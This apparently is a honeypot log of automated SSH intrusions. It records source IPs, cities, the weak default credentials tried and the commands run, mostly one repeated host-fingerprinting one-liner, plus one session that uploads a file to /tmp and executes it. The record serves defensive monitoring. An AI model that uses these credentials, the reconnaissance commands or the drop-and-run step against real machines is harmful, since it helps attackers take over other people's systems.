echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 monsoon_root_14 (143.244.136.134) — Bengaluru, India · 1 session · 4 cmds

2026-03-01 12:39 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 yankee_root_10 (24.199.98.162) — Santa Clara, United States · 6 sessions · 24 cmds

2026-03-01 12:11 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 liberty_root_8 (162.243.56.62) — Secaucus, United States · 8 sessions · 32 cmds

2026-03-01 12:13 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 cowboy_root_18 (107.170.64.85) — Secaucus, United States · 7 sessions · 28 cmds

2026-03-01 12:05 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 chai_root_14 (139.59.46.93) — Bengaluru, India · 5 sessions · 20 cmds

2026-03-01 12:07 EST · as root/12345678, root/admin, root/admin123

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 yankee_root_22 (64.23.157.241) — Santa Clara, United States · 2 sessions · 8 cmds

2026-03-01 12:09 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 tea_root_16 (161.35.175.43) — Slough, United Kingdom · 6 sessions · 24 cmds

2026-03-01 12:02 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 beefeater_root_2 (159.65.18.206) — Slough, United Kingdom · 7 sessions · 28 cmds

2026-03-01 10:47 EST · as admin/admin, admin/admin123, admin/password

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 monsoon_root_15 (159.89.166.56) — Bengaluru, India · 12 sessions · 48 cmds

2026-03-01 10:44 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 12x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×12

$ uname -s -v -n -m 2 > /dev/null ×12

$ uname -m 2 > /dev/null ×12

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×12

🎭 monsoon_root_16 (143.110.242.42) — Bengaluru, India · 1 session · 4 cmds

2026-03-01 10:46 EST · as root/1234

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 liberty_root_23 (52.159.247.66) — San Francisco, United States · 2 sessions · 2 cmds

2026-03-01 10:00 EST · as root/1234, root/12345678

mount → hostname discovery

$ mount | head -5

$ hostname

↳ hostname discovery

🎭 crumpet_root_4 (161.35.37.236) — Slough, United Kingdom · 10 sessions · 40 cmds

2026-03-01 08:31 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 baguette_pi (82.67.89.16) — Rouen, France · 2 sessions · 3 cmds

2026-03-01 09:34 EST · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x UFmeigKo && bash -c ./UFmeigKo

↳ make executable

$ ./UFmeigKo

↳ execute payload

$ scp -t /tmp/UFmeigKo

↳ execute from /tmp

🎭 windmill_root (64.227.71.86) — Amsterdam, Netherlands · 8 sessions · 32 cmds

2026-03-01 08:25 EST · as admin/admin, admin/admin123, admin/password

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 windmill_root_10 (164.90.200.82) — Amsterdam, Netherlands · 9 sessions · 36 cmds

2026-03-01 08:25 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 gouda_root (209.38.110.17) — Amsterdam, Netherlands · 3 sessions · 12 cmds

2026-03-01 08:27 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 clog_root_6 (146.190.237.1) — Amsterdam, Netherlands · 9 sessions · 36 cmds

2026-03-01 07:23 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 reef_root_10 (170.64.219.231) — Sydney, Australia · 5 sessions · 20 cmds

2026-03-01 07:22 EST · as admin/password, root/12345678, root/qwerty

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 lotus_root_19 (139.59.34.190) — Bengaluru, India · 6 sessions · 24 cmds

2026-03-01 06:30 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

